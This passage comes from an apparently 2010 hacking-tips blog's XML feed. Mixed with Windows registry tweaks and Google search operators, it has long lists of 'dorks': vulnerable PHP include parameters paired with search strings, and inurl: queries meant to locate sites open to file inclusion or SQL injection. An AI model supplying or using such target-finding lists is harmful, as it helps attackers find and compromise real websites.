index.php?var1=&lt;br /&gt;index.php?var= "index.php?var2="&lt;br /&gt;index.php?var= index.php?var2=&lt;br /&gt;index.php?var= "index.php?var=*.php"&lt;br /&gt;index.php?var= index.php?var=*.php&lt;br /&gt;/login.php?dir= login.php?dir=&lt;br /&gt;/login.php?dir= "login.php?dir="&lt;br /&gt;/login.php?dir= login.php?dir=&lt;br /&gt;main.php?id= "main.php?id=*.php"&lt;br /&gt;/main.php?sayfa= "main.php?sayfa="&lt;br /&gt;/main.php?sayfa= main.php?sayfa=&lt;br /&gt;/mcf.php?content= mcf.php"&lt;br /&gt;mcf.php?content= mcf.php"&lt;br /&gt;mcf.php?content= "mcf.php"&lt;br /&gt;mcf.php?content= mcf.php&lt;br /&gt;/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar&lt;br /&gt;/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar&lt;br /&gt;/modules/TotalCalendar/about.php?inc_dir= "TotalCalendar"&lt;br /&gt;/modules/TotalCalendar/about.php?inc_dir= TotalCalendar&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root= "vwar"&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root= vwar&lt;br /&gt;phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "index.php?id="&lt;br /&gt;phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=&lt;br /&gt;phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="&lt;br /&gt;phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer"&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "CMS"&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&lt;br /&gt;/skin/zero_vote/error.php?dir= "skin/zero_vote/error.php"&lt;br /&gt;/skin/zero_vote/error.php?dir= skin/zero_vote/error.php&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= "Powered By ScozNews"&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= Powered By ScozNews&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= "ScozNews"&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= ScozNews&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;amp;CONFIG[captcha]=1&amp;amp;CONFIG[path]= "Aardvark"&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;amp;CONFIG[captcha]=1&amp;amp;CONFIG[path]= Aardvark&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;amp;CONFIG[captcha]=1&amp;amp;CONFIG[path]= "Aardvark TopSites"&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;amp;CONFIG[captcha]=1&amp;amp;CONFIG[path]= Aardvark TopSites&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;amp;CONFIG[captcha]=1&amp;amp;CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;amp;CONFIG[captcha]=1&amp;amp;CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2&lt;br /&gt;/sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"&lt;br /&gt;/sources/template.php?CONFIG[main_path]= (Powered By ScozNews)&lt;br /&gt;/sources/template.php?CONFIG[main_path]= Powered By ScozNews&lt;br /&gt;/sources/template.php?CONFIG[main_path]= "ScozNews"&lt;br /&gt;/sources/template.php?CONFIG[main_path]= ScozNews&lt;br /&gt;/surveys/survey.inc.php?path= surveys&lt;br /&gt;/surveys/survey.inc.php?path= "surveys"&lt;br /&gt;/tags.php?BBCodeFile= intitle:"Tagger LE"&lt;br /&gt;/tags.php?BBCodeFile= intitle:"Tagger LE" tags.php&lt;br /&gt;/tags.php?BBCodeFile= "Tagger LE"&lt;br /&gt;/tags.php?BBCodeFile= Tagger LE&lt;br /&gt;/tags.php?BBCodeFile= "tags.php"&lt;br /&gt;/tags.php?BBCodeFile= tags.php&lt;br /&gt;/templates/headline_temp.php?nst_inc= intitle:fusion:news:management&lt;br /&gt;/templates/headline_temp.php?nst_inc= 'fusion"&lt;br /&gt;/templates/headline_temp.php?nst_inc= "fusion"&lt;br /&gt;/templates/headline_temp.php?nst_inc= fusion&lt;br /&gt;/templates/headline_temp.php?nst_inc= fusion:news:management:system&lt;br /&gt;/templates/headline_temp.php?nst_inc= "management"&lt;br /&gt;/templates/headline_temp.php?nst_inc= management&lt;br /&gt;/templates/headline_temp.php?nst_inc= "news"&lt;br /&gt;/templates/headline_temp.php?nst_inc= news&lt;br /&gt;/templates/headline_temp.php?nst_inc= "system"&lt;br /&gt;/templates/headline_temp.php?nst_inc= system&lt;br /&gt;/tools/send_reminders.php?includedir= "day.php?date="&lt;br /&gt;/tools/send_reminders.php?includedir= day.php?date=&lt;br /&gt;/ws/get_events.php?includedir= /WebCalendar/&lt;br /&gt;/ws/get_events.php?includedir= "/WebCalendar/"&lt;br /&gt;/ws/get_events.php?includedir= "WebCalendar"&lt;br /&gt;/zipndownload.php?PP_PATH= "PhotoPost"&lt;br /&gt;/zipndownload.php?PP_PATH= PhotoPost&lt;br /&gt;/zipndownload.php?PP_PATH= "PhotoPostP"&lt;br /&gt;/zipndownload.php?PP_PATH= "PhotoPost PHP"&lt;br /&gt;/zipndownload.php?PP_PATH= "PhotoPost PHP 4.6"&lt;br /&gt;/zipndownload.php?PP_PATH= PhotoPost PHP 4.6&lt;br /&gt;/zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"&lt;br /&gt;/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6&lt;br /&gt;cmd.php?arg= .php?arg=&lt;br /&gt;/codebb/lang_select?phpbb_root_path= codebb&lt;br /&gt;/codebb/lang_select?phpbb_root_path= codebb 1.1b3&lt;br /&gt;components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery&lt;br /&gt;components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery&lt;br /&gt;components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php&lt;br /&gt;content.php?inc= .php?inc="&lt;br /&gt;content.php?seite= content.php?seite=&lt;br /&gt;content.php?seite= .php?seite=&lt;br /&gt;dbase.php?action= dbase.php&lt;br /&gt;dbase.php?action= dbase.php?action=&lt;br /&gt;dbase.php?action= .php?action=&lt;br /&gt;default.php?arquivo= .php?arquivo=&lt;br /&gt;default.php?vis= .php?vis="&lt;br /&gt;define.php?term= .php?term="&lt;br /&gt;detail.php?prod= detail.php?prod="&lt;br /&gt;detail.php?prod= .php?prod="&lt;br /&gt;details.php?loc= details.php?loc=&lt;br /&gt;details.php?loc= .php?loc=&lt;br /&gt;directions.php?loc= directions.php?loc=&lt;br /&gt;direct.php?loc= direct.php?loc=&lt;br /&gt;display.php?f= display.php?f=&lt;br /&gt;display.php?file= display.php?file=&lt;br /&gt;display.php?lang= display.php?lang=&lt;br /&gt;display.php?l= display.php?l=&lt;br /&gt;display.php?ln= display.php?ln=&lt;br /&gt;display.php?pag= display.php?pag=&lt;br /&gt;display.php?page= display.php?page="&lt;br /&gt;display.php?page= .php?page="&lt;br /&gt;display.php?page=〈= display.php?page="&lt;br /&gt;display.php?page=〈= .php?page="&lt;br /&gt;display.php?p= display.php?p=&lt;br /&gt;display.php?pg= display.php?pg=&lt;br /&gt;display.php?s= display.php?s=&lt;br /&gt;display.php?table= display.php?table=&lt;br /&gt;display.php?table= .php?table=&lt;br /&gt;download.php?sub= "download.php?sub="&lt;br /&gt;download.php?sub= download.php?sub=&lt;br /&gt;eng.php?img= eng.php?img=&lt;br /&gt;eng.php?img= .php?img=&lt;br /&gt;/exibir.php?arquivo= .php?arquivo=&lt;br /&gt;experts.php?sub= "experts.php?sub="&lt;br /&gt;experts.php?sub= experts.php?sub=&lt;br /&gt;forum.php?seite= .php?seite=&lt;br /&gt;frag.php?exec= frag.php"&lt;br /&gt;frag.php?exec= frag.php?exec="&lt;br /&gt;frag.php?exec= .php?exec="&lt;br /&gt;frame.php?loc= .php?loc="&lt;br /&gt;galerie.php?do= .php?do="&lt;br /&gt;glossary.php?term= .php?term="&lt;br /&gt;handlinger.php?vis= .php?vis="&lt;br /&gt;/help_text_vars.php?cmd=dir&amp;amp;PGV_BASE_DIRECTORY= PHP Ged View&lt;br /&gt;/help_text_vars.php?cmd=dir&amp;amp;PGV_BASE_DIRECTORY= PHP GedView&lt;br /&gt;/help_text_vars.php?cmd=dir&amp;amp;PGV_BASE_DIRECTORY= PHPGedView&lt;br /&gt;/help_text_vars.php?cmd=dir&amp;amp;PGV_BASE_DIRECTORY= PHPGedView &lt;= 3.3.7&lt;br /&gt;home1.php?ln= .php?ln=&lt;br /&gt;home2.php?ln= .php?ln=&lt;br /&gt;home.php?a= home.php?a="&lt;br /&gt;home.php?a= .php?a="&lt;br /&gt;home.php?act= "home.php?act="&lt;br /&gt;home.php?act= home.php?act=&lt;br /&gt;home.php?arg= .php?arg=&lt;br /&gt;home.php?func= .php?func="&lt;br /&gt;home.php?i= "home.php?i="&lt;br /&gt;home.php?i= home.php?i=&lt;br /&gt;home.php?inc= "home.php?inc="&lt;br /&gt;home.php?inc= home.php?inc=&lt;br /&gt;home.php?ln= .php?ln=&lt;br /&gt;home.php?ltr= .php?ltr="&lt;br /&gt;home.php?sit= .php?sit="&lt;br /&gt;home.php?table= .php?table=&lt;br /&gt;image.php?img= image.php?img=&lt;br /&gt;image.php?img= .php?img=&lt;br /&gt;img.php?loc= img.php?loc="&lt;br /&gt;img.php?loc= .php?loc="&lt;br /&gt;inc.php?inc= .php?inc="&lt;br /&gt;index1.php?arg= .php?arg=&lt;br /&gt;index1.php?arq= .php?arq=&lt;br /&gt;index1.php?func= .php?func="&lt;br /&gt;index1.php?inc= .php?inc="&lt;br /&gt;index1.php?lk= .php?lk="&lt;br /&gt;/index1.php?ln= .php?ln=&lt;br /&gt;index1.php?ltr= .php?ltr="&lt;br /&gt;index1.php?mid= index1.php?mid=&lt;br /&gt;index1.php?page= index1.php?page="&lt;br /&gt;index1.php?p= .php?p="&lt;br /&gt;index1.php?p= .php?pag="&lt;br /&gt;index1.php?p= .php?page="&lt;br /&gt;index1.php?p= .php?pg="&lt;br /&gt;index1.php?s= index1.php?s="&lt;br /&gt;index1.php?show= index1.php?show="&lt;br /&gt;index1.php?show= .php?show="&lt;br /&gt;index1.php?table= .php?table=&lt;br /&gt;index2.php?arg= .php?arg=&lt;br /&gt;index2.php?arq= .php?arq=&lt;br /&gt;index2.php?c= index2.php?c="&lt;br /&gt;index2.php?c= .php?c="&lt;br /&gt;index2.php?cont= index2.php?cont="&lt;br /&gt;index2.php?cont= .php?cont="&lt;br /&gt;index2.php?content= index2.php?cont="&lt;br /&gt;index2.php?content= index2.php?content="&lt;br /&gt;index2.php?content= .php?content="&lt;br /&gt;index2.php?content= index2.php?content=&lt;br /&gt;index2.php?content= .php?content=&lt;br /&gt;index2.php?i= /index2.php?i=&lt;br /&gt;index2.php?inc= .php?inc="&lt;br /&gt;index2.php?l= .php?l="&lt;br /&gt;index2.php?lg= index.php?lg="&lt;br /&gt;index2.php?lk= .php?lk="&lt;br /&gt;index2.php?ln= index.php?ln="&lt;br /&gt;index2.php?ln= .php?ln="&lt;br /&gt;index2.php?lng= index.php?lng="&lt;br /&gt;index2.php?loca= index2.php?loca=&lt;br /&gt;index2.php?loca= .php?loca=&lt;br /&gt;index2.php?meio= .php?meio=&lt;br /&gt;index2.php?s= index2.php?s="&lt;br /&gt;index2.php?s= .php?s="&lt;br /&gt;index2.php?table= .php?table=&lt;br /&gt;index2.php?x= index2.php?x=&lt;br /&gt;index2.php?x= .php?x=&lt;br /&gt;index.php3?act= index.php3?act=&lt;br /&gt;index.php3?act= .php3?act=&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-8262867164714691855?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/8262867164714691855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/some-more-sql-dorks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/8262867164714691855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/8262867164714691855'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/some-more-sql-dorks.html' title='SOME MORE SQL DORKS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6203649130231335628</id><published>2010-08-02T14:06:00.000-07:00</published><updated>2010-08-02T14:07:43.274-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SIDEBAR'/><title type='text'>FIX YOUR SIDEBAR</title><content type='html'>&lt;span style="color: rgb(51, 102, 255);"&gt;Windows Registry Editor Version 5.00&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;[HKEY_CLASSES_ROOT\CLSID\{00021400-0000-0000-C000-000000000046}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"PersistMoniker"=hex(2):66,00,69,00,6c,00,65,00,3a,00,2f,00,2f,00,25,00,75,00,\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;  73,00,65,00,72,00,61,00,70,00,70,00,64,00,61,00,74,00,61,00,25,00,5c,00,4d,\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;  00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,49,00,6e,00,74,00,\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;  65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;  00,72,00,5c,00,44,00,65,00,73,00,6b,00,74,00,6f,00,70,00,2e,00,68,00,74,00,\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;  74,00,00,00&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;save above in notepad as anything.bat and run !!!&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6203649130231335628?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6203649130231335628/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/fix-your-sidebar.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6203649130231335628'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6203649130231335628'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/fix-your-sidebar.html' title='FIX YOUR SIDEBAR'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-8148993077568959534</id><published>2010-08-02T14:05:00.001-07:00</published><updated>2010-08-02T14:05:53.417-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='speed'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><title type='text'>SPEED UP YOUR INTERNET</title><content type='html'>Windows 2k/XP&lt;br /&gt;&lt;br /&gt;1. First, open the Windows Registry using Regedit, and (after backing up) navigate to:&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider&lt;br /&gt;2. Note the following lines (all hex dwords):&lt;br /&gt;Class = 008 ( biggrin.gif - indicates that TCP/IP is a name service provider, don't change&lt;br /&gt;LocalPriority = 1f3 (499) - local names cache&lt;br /&gt;HostsPriority = 1f4 (500) - the HOSTS file&lt;br /&gt;DnsPriority = 7d0 (2000) - DNS&lt;br /&gt;NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS&lt;br /&gt;3. What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:&lt;br /&gt;4. Change the "Priority" lines to:&lt;br /&gt;LocalPriority = 005 (5) - local names cache&lt;br /&gt;HostsPriority = 006 (6) - the HOSTS file&lt;br /&gt;DnsPriority = 007 (7) - DNS&lt;br /&gt;NetbtPriority = 008 ( biggrin.gif - NetBT name-resolution, including WINS&lt;br /&gt;5. Reboot for changes to take effect&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-8148993077568959534?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/8148993077568959534/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/speed-up-your-internet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/8148993077568959534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/8148993077568959534'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/speed-up-your-internet.html' title='SPEED UP YOUR INTERNET'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5224667475168383614</id><published>2010-08-02T14:02:00.000-07:00</published><updated>2010-08-02T14:03:24.332-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>SOME GOOGLE SEARCH TRICKS</title><content type='html'>A few things you might want to try with Google:&lt;br /&gt;&lt;br /&gt;Hand type the following prefixes and note their utility:&lt;br /&gt;&lt;br /&gt;link:url Shows other pages with links to that url.&lt;br /&gt;&lt;br /&gt;related:url same as "what's related" on serps.&lt;br /&gt;&lt;br /&gt;site:domain restricts search results to the given domain.&lt;br /&gt;&lt;br /&gt;allinurl: shows only pages with all terms in the url.&lt;br /&gt;&lt;br /&gt;inurl: like allinurl, but only for the next query word.&lt;br /&gt;&lt;br /&gt;allintitle: shows only results with terms in title.&lt;br /&gt;&lt;br /&gt;intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.&lt;br /&gt;&lt;br /&gt;cache:url will show the Google version of the passed url.&lt;br /&gt;&lt;br /&gt;info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.&lt;br /&gt;&lt;br /&gt;spell: will spell check your query and search for it.&lt;br /&gt;&lt;br /&gt;stocks: will lookup the search query in a stock index.&lt;br /&gt;&lt;br /&gt;filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.&lt;br /&gt;&lt;br /&gt;daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.&lt;br /&gt;&lt;br /&gt;maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.&lt;br /&gt;&lt;br /&gt;phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)&lt;br /&gt;&lt;br /&gt;site:www.somesite.net "+www.somesite.+net"&lt;br /&gt;(tells you how many pages of your site are indexed by google)&lt;br /&gt;&lt;br /&gt;allintext: searches only within text of pages, but not in the links or page title&lt;br /&gt;&lt;br /&gt;allinlinks: searches only within links, not text or title&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I hope there is something new in here for you and maybe this infos will be helpfull for ya.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5224667475168383614?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5224667475168383614/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/some-google-search-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5224667475168383614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5224667475168383614'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/some-google-search-tricks.html' title='SOME GOOGLE SEARCH TRICKS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-8079153870015703342</id><published>2010-08-02T13:58:00.001-07:00</published><updated>2010-08-02T13:58:42.950-07:00</updated><title type='text'>Enable Folder and Icon Refresh</title><content type='html'>This reg file Enables Folder and Icon Refresh.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Copy the following (everything in the box) into notepad&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;QUOTE&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"NoNetCrawling"=dword:00000000&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Save the file as disablerefreshundo.reg&lt;br /&gt;3. Double click the file to import into your registry.&lt;br /&gt;&lt;br /&gt;NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-8079153870015703342?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/8079153870015703342/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/enable-folder-and-icon-refresh.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/8079153870015703342'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/8079153870015703342'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/enable-folder-and-icon-refresh.html' title='Enable Folder and Icon Refresh'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5587706412480528549</id><published>2010-08-02T13:12:00.000-07:00</published><updated>2010-08-02T13:15:16.834-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='disable'/><title type='text'>HOW TO DISABLE ERROR REPORTING</title><content type='html'>&lt;strong&gt;&lt;span style="color: rgb(51, 51, 255); font-family: trebuchet ms;"&gt; &lt;span style="color: rgb(0, 0, 0);"&gt;1] Open Control Panel&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; 2]Click on the Performance and Maintenance.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; 3]Then Click on System.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; 4]After clik on the Advanced tab&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; 5]Open error-reporting button on the bottom of the windows.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; 6]Select Disable error reporting.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; 7]Click OK&lt;/span&gt;. &lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; Enjoy!!!!!&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5587706412480528549?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5587706412480528549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-disable-error-reporting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5587706412480528549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5587706412480528549'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-disable-error-reporting.html' title='HOW TO DISABLE ERROR REPORTING'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5339645321511997577</id><published>2010-08-02T00:54:00.000-07:00</published><updated>2010-08-02T13:03:25.343-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><title type='text'>SOME SQL DORKS</title><content type='html'>sqinurl:trainers.php?id=&lt;br /&gt;inurl:buy.php?category=&lt;br /&gt;inurl:article.php?ID=&lt;br /&gt;inurl:play_old.php?id=&lt;br /&gt;inurl:declaration_more.php?decl_id=&lt;br /&gt;inurl:pageid=&lt;br /&gt;inurl:games.php?id=&lt;br /&gt;inurl:page.php?file=&lt;br /&gt;inurl:newsDetail.php?id=&lt;br /&gt;inurl:gallery.php?id=&lt;br /&gt;inurl:article.php?id=&lt;br /&gt;inurl:show.php?id=&lt;br /&gt;inurl:staff_id=&lt;br /&gt;inurl:newsitem.php?num=&lt;br /&gt;inurl:readnews.php?id=&lt;br /&gt;inurl:top10.php?cat=&lt;br /&gt;inurl:historialeer.php?num=&lt;br /&gt;inurl:reagir.php?num=&lt;br /&gt;inurl:Stray-Questions-View.php?num=&lt;br /&gt;inurl:forum_bds.php?num=&lt;br /&gt;inurl:game.php?id=&lt;br /&gt;inurl:view_product.php?id=&lt;br /&gt;inurl:newsone.php?id=&lt;br /&gt;inurl:sw_comment.php?id=&lt;br /&gt;inurl:news.php?id=&lt;br /&gt;inurl:avd_start.php?avd=&lt;br /&gt;inurl:event.php?id=&lt;br /&gt;inurl:product-item.php?id=&lt;br /&gt;inurl:sql.php?id=&lt;br /&gt;inurl:news_view.php?id=&lt;br /&gt;inurl:select_biblio.php?id=&lt;br /&gt;inurl:humor.php?id=&lt;br /&gt;inurl:aboutbook.php?id=&lt;br /&gt;inurl:ogl_inet.php?ogl_id=&lt;br /&gt;inurl:fiche_spectacle.php?id=&lt;br /&gt;inurl:communique_detail.php?id=&lt;br /&gt;inurl:sem.php3?id=&lt;br /&gt;inurl:kategorie.php4?id=&lt;br /&gt;inurl:news.php?id=&lt;br /&gt;inurl:index.php?id=&lt;br /&gt;inurl:faq2.php?id=&lt;br /&gt;inurl:show_an.php?id=&lt;br /&gt;inurl:preview.php?id=&lt;br /&gt;inurl:loadpsb.php?id=&lt;br /&gt;inurl:opinions.php?id=&lt;br /&gt;inurl:spr.php?id=&lt;br /&gt;inurl:pages.php?id=&lt;br /&gt;inurl:announce.php?id=&lt;br /&gt;inurl:clanek.php4?id=&lt;br /&gt;inurl:participant.php?id=&lt;br /&gt;inurl:download.php?id=&lt;br /&gt;inurl:main.php?id=&lt;br /&gt;inurl:review.php?id=&lt;br /&gt;inurl:chappies.php?id=&lt;br /&gt;inurl:read.php?id=&lt;br /&gt;inurl:prod_detail.php?id=&lt;br /&gt;inurl:viewphoto.php?id=&lt;br 